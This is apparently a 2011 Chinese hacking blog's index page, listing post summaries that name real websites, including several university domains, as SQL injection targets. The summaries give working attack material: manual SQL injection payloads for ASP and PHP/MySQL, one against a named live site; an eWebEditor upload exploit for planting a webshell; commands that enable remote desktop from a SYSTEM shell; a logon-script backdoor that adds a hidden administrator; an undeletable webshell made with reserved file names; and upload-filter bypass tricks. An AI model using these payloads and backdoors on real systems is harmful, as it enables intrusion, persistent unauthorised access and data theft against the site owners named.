Swane's blog

游弋于黑白之间,但愿我未曾来过……

导航

2011年4月2日 #

nwu.edu.cn SQL injection

摘要: nwu.edu.cn SQL injection 阅读全文

posted @ 2011-04-02 23:49 无名组 阅读(10) 评论(0) 推荐(0) 编辑

注入天书

摘要: SQL 注入天书 - ASP 注入漏洞全接触收藏引言随着 B/S 模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的 SQL Injection,即SQL注入。 SQL注入是从正常的 WWW 端口访问,而且表面看起来跟一般的 Web 页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看 IIS 日志的习惯, 阅读全文

posted @ 2011-04-02 22:00 无名组 阅读(156) 评论(0) 推荐(0) 编辑

手工注入经验

摘要: 一、判断是否可以注入:1. 单引号但如果单引号测试出错,是可以试试and 1=1的,因为一些对SQL注入有一点了解的程序员认为只要把单引号过滤掉就可以了2. 传入参数为数字型时:and 1=1and 1=2可以注入的提示:BOF或EOF,程序未做任何判断提示找不到记录,判断了rs.eof显示内容为空,程序加了on error resume next不可注入的提示:类型转换时出错其他自定义的出错提示3. 传入参数不为数字型时,需要变动一下比如:asp?id=aeo' and '1'='1asp?id=aeo' and '1'='2二 阅读全文

posted @ 2011-04-02 21:58 无名组 阅读(458) 评论(0) 推荐(0) 编辑

ewebeditor高版本>=5.50day

摘要: 对6.X的也管用,对ASP。aspx。JSP。均管用。利用方法:先访问这个地址Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp访问这个地址可以建立个A.ASP的文件夹……再用这个html代码上传。html代码:<form action="http://www.xxx.com/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp" method=po 阅读全文

posted @ 2011-04-02 21:56 无名组 阅读(148) 评论(0) 推荐(0) 编辑

PHP+MySQL 手工注入语句

摘要: 暴字段长度order by num/*匹配字段and 1=1 union select 1,2,3,4,5…….n/*暴字段位置and 1=2 union select 1,2,3,4,5…..n/*利用内置函数暴数据库信息version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用):and 1=2 union all select version() /*and 1=2 union all select database() /*and 1=2 union all select user() /*操作系统信息:and 1=2 union all se 阅读全文

posted @ 2011-04-02 21:53 无名组 阅读(161) 评论(0) 推荐(0) 编辑

php+mysql暴库语法

摘要: 1.判断版本http://www.xxx.xxx/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询2.猜解 字段数目,用order by也可以猜,也可以用union select一个一个的猜解http://www.xxx.xxx/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--3.查看数据库版本及当前用户,http://www.xxx.xxx/document 阅读全文

posted @ 2011-04-02 21:52 无名组 阅读(271) 评论(0) 推荐(0) 编辑

weldinfo.net SQL injection

摘要: weldinfo.net SQL injection 阅读全文

posted @ 2011-04-02 21:50 无名组 阅读(5) 评论(0) 推荐(0) 编辑

gz18school.com SQL injection

摘要: gz18school.com SQL injection 阅读全文

posted @ 2011-04-02 21:43 无名组 阅读(5) 评论(0) 推荐(0) 编辑

analchem.cn SQL injection

摘要: analchem.cn SQL injection 阅读全文

posted @ 2011-04-02 21:34 无名组 阅读(7) 评论(0) 推荐(0) 编辑

kjc.qau.edu.cn SQL injection

摘要: kjc.qau.edu.cn SQL injection 阅读全文

posted @ 2011-04-02 20:53 无名组 阅读(7) 评论(0) 推荐(0) 编辑

shmtu.edu.cn SQL injection

摘要: shmtu.edu.cn SQL injection 阅读全文

posted @ 2011-04-02 17:19 无名组 阅读(14) 评论(0) 推荐(0) 编辑

baihe.com SQL injection

摘要: baihe.com SQL injection 阅读全文

posted @ 2011-04-02 15:09 无名组 阅读(5) 评论(0) 推荐(0) 编辑

MYSQL高级注入实例

摘要: ############################################MYSQL高级注入实例###########################################-----------------------------------系统信息 -------------------------------------------http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,version(),4,5××××××× 阅读全文

posted @ 2011-04-02 13:38 无名组 阅读(194) 评论(0) 推荐(0) 编辑

MySQl注入笔记

摘要: 目标站点:http://www.babydaily.com.hk/注入点:http://www.babydaily.com.hk/newsDetail.php?id=53首先,获得信息,加一个单引号提交http://www.babydaily.com.hk/newsDetail.php?id=53’返回如下信息,You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\ 阅读全文

posted @ 2011-04-02 13:36 无名组 阅读(236) 评论(0) 推荐(0) 编辑

开启终端的简单方法

摘要: 今天介绍的这种开终端的方法,绿色,环保,无污染~~不须上传任何文件开启终端的方法适合win2k,xp,2003.本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~在无须传任何文件的情况下开启终端服务。一、win 2k下终端开启终端首先用ECHO写一个3389.reg文件,然后导入到注册表,echo代码如下:echo Windows Registry Editor Version 5.00 >>3389.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcac 阅读全文

posted @ 2011-04-02 13:30 无名组 阅读(402) 评论(0) 推荐(0) 编辑

总结几个搜索编辑器漏洞

摘要: site:editor inurl:asp?id inurl:ewebeditornet比如常见的编辑器漏洞有:ewebeditor ewebeditornet fckeditoreditor southidceditor SouthidcEditorbigcneditor一:ewebeditor为例1:默认下载下来的后台: http://www.test.com/ewebeditor/admin_login.asp后台如果能进入:可点击样式管理:standard 拷贝一份(直接修改改不了)在拷贝的一份里加入图片类型( asa aaspsp ) 然后点预览在编辑器里点设计 然后直接上传asa大 阅读全文

posted @ 2011-04-02 13:28 无名组 阅读(269) 评论(0) 推荐(0) 编辑

insert式注射攻击解析

摘要: 当碰到一些特殊的站时可以试着用insert注入(如:留言版神马的..前提是必须与数据库交互)首先我们先了解下insert的语法insert into table (column_name_1,column_name_2,column_n) vlaues (value_1,value_2,value_n)当value值数大于column时,数据库就会爆出错误于是当我们在网页中提交a’,null,null,null,null,null);– 如返回错误页面a’,null,null,null,null,null,null);– 如返回正常页面(至于过滤单引号的问题就不在本文讨论范围内了)说明当前表字 阅读全文

posted @ 2011-04-02 13:23 无名组 阅读(145) 评论(0) 推荐(0) 编辑

几种留后门技巧

摘要: 建立一个别人永远删不掉的管理员用户操作步骤:1、在自己电脑里面建立一个.txt文本文件.2、在里面输入内容@echo offnet user xixi 123456 /add 注释:前面xixi是用户名后面123456是密码;net localgroup administrators xixi /add3、把这个文件保存,更改后缀为xixi.bat 注释:前面名字随便,后面格式一定要是bat;4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\Scripts\Logon文件目录下,没有的话自己创建。完成,下次对方电脑无论如何都有这个管理员帐号,删除 阅读全文

posted @ 2011-04-02 13:17 无名组 阅读(644) 评论(0) 推荐(0) 编辑

打造永不被删除的webshell

摘要: Windows 下不能够以下面这些字样来命名文件/文件夹,包括:“aux”,“com1”“com2”“prn”“con”和“nul”等,但是通过cmd下是可以创建此类文件夹的,使用copy命令即可实现:D:\wwwroot>copy rootkit.asp \\.\D:\\wwwroot\aux.asp已复制 1 个文件。D:\AspWebServer\wwwroot>dir驱动器 D 中的卷没有标签。卷的序列号是 47747.net6-1D29D:\AspWebServer\wwwroot 的目录2010-04-25 14:41 <DIR> .2010-04-25 1 阅读全文

posted @ 2011-04-02 13:14 无名组 阅读(194) 评论(0) 推荐(0) 编辑

入侵渗透中用到的一些技巧和思路

摘要: 上传漏洞拿shell:入侵渗透中用到的一些技巧和思路 1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx....之类的马,拿到shell. 2.就是在上传时在后缀后面加空格或者加几点,也许也会有惊奇的发现。例:*.asp ,*.asp..。 3.利用双重扩展名上传例如:*.jpg.asa格式(也可以配上第二点一起利用)。 4.gif文件头欺骗 5.同名重复上传也很OK。:入侵渗透中用到的一些技巧和思路入侵渗透中用到的命令,语法:入侵渗透中用到的一些技巧和思路 set,systeminfo,ipconfig,ping,利用这些命令可以收到比较多的系统信息 tasklis 阅读全文

posted @ 2011-04-02 12:04 无名组 阅读(253) 评论(0) 推荐(0) 编辑